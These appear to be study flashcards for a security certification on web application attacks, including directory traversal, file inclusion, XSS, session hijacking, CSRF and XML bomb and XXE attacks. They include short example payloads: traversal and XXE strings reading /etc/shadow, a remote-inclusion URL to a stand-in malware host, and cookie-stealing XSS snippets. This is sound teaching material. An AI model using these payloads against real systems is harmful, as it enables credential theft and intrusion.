Section 11: Application Attacks Flashcards
Directory Traversal
website.com/../../../../../etc/shadow
▪ Attackers may try to use the URL-encoded form %2E%2E%2F instead of ../
File Inclusion
▪ Allows an attacker to download a file from an arbitrary location or upload an executable or script file to open a backdoor
▪ Remote File Inclusion
● Executes a script to inject a remote file into the web app or the website
website.com/login.php?user=bob
website.com/login.php?http://malware.com/script.php
▪ Local File Inclusion
● Adds a file to the web app or website that already exists on the hosting server
Uploading a profile picture
Cross-Site Scripting (XSS)
Injects a malicious script into a trusted site to compromise the site’s visitors
Types
● Non-Persistent XSS
o Happens once
manually inputting into a field such as a username or password
● Persistent XSS
o Embedded code
comment on a blog site
Method
● Attacker identifies an input validation vulnerability within a trusted website
● Attacker crafts a URL to perform code injection against the trusted website
● The trusted site returns a page containing the injected malicious code
● Malicious code runs in the client’s browser with the same permission level as the trusted site
This is about compromising the user, not the web server. It usually requires user interaction (clicking on the malicious link) and tricks the user’s system into running malicious code with the privileges of the trusted website.
https://website.com/search?q=<script%20type='application/javascript'>alert('you’re dumb')</script>
DOM XSS
Regular XSS attacks are considered ‘server-side’ attacks since the code is technically being run by the server. DOM XSS is a client-based attack.
The DOM (Document Object Model) controls how things are displayed in the client’s browser.
https://website.com/index.html#default=
alert(document.cookie)
This is attempting to access the user cookies within their browser. If you see anything related to ‘document’ (Literally the D in DOM) in an XSS, it is likely a DOM XSS.
Cookie
Text file used to store information about a user when they visit a website
● Non-Persistent Cookie (Session Cookie)
o Reside in memory
● Persistent Cookie
o Stored in browser cache
Session Hijacking
The attacker disconnects a host and then replaces it with his or her own machine by spoofing the original host’s IP address
● Session cookie theft
● Non-random tokens
Session Prediction
Predicts a session token to hijack the session
▪ Session tokens must be generated using a non-predictable algorithm and must not reveal any info about the session’s client
Cross-Site Request Forgery (CSRF)
Exploits a session that was started on another site and within the same web browser
The victim needs to have the attacker’s site open and be logged in to the target site at the same time in the same browser.
Example: A user has the attacker’s website open and then logs into their bank. The bank assigns the user a token. If the attacker is able to guess the session token, they can send a request through the user’s browser to the bank site and request a password reset or update the default email address, and the bank will do it because it thinks the request is coming from the user.
CSRF Prevention
● Ensure user-specific tokens are used in all form submissions
● Add randomness and prompt for additional information for password resets
● Require users to enter their current password when changing it
Extensible Markup Language (XML)
Used by web apps for authentication, authorization, and other types of data exchange
XML Bomb (Billion Laughs Attack)
XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it
If you see ‘lol’ in XML code, it could be an XML Bomb
XML External Entity (XXE) Attack
Attempts to embed a request for a local resource
If you see something like “ENTITY xxe SYSTEM file:///etc/shadow” in the XML code, it could be an XXE
What is a common Service Oriented Architecture Protocol (SOAP) vulnerability?
XML Denial of Service